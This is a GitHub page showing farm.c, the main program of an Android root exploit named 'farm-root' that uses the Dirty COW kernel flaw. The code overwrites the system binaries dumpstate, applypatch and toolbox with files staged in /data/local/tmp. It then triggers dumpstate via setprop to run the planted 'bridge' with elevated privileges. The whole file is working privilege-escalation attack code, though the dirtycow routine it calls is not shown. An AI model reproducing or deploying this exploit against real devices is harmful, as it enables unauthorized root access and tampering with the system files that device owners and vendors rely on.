-
Notifications
You must be signed in to change notification settings - Fork 9
/
farm.c
47 lines (37 loc) · 1.11 KB
/
farm.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#include <android/log.h>
#include <unistd.h>
#include <sys/system_properties.h>
#include "shared.h"
// dirtycow.c
int dirtycow(const char *dst, const char *src);
int main(int argc, const char *argv[]) {
LOGV("[*] farm-root started");
rsf_unset(RSF_ALL_DONE);
LOGV("[*] building a bridge");
if( dirtycow("/system/bin/dumpstate", "/data/local/tmp/bridge") ) {
LOGV("ERROR: could not overwrite /system/bin/dumpstate");
return 1;
}
LOGV("[*] starting the bridge");
if(!fork()) {
const char *args[] = {"/system/bin/setprop", "ctl.start", "dumpstate", 0};
if( execv(args[0], (char *const *)args) ) {
LOGV("ERROR running setprop");
return 0;
}
}
LOGV("[*] putting a till back in the shed");
if( dirtycow("/system/bin/applypatch", "/data/local/tmp/till") ) {
LOGV("ERROR: could not overwrite /system/bin/applypatch");
return 1;
}
LOGV("[*] overwriting the toolbox");
if( dirtycow("/system/bin/toolbox", "/data/local/tmp/toolbox") ) {
LOGV("too much of a mess");
return 1;
}
LOGV("[*] waiting for process to finish");
while(!rsf_check(RSF_ALL_DONE)) sleep(1);
LOGV("[*] done!");
return 0;
}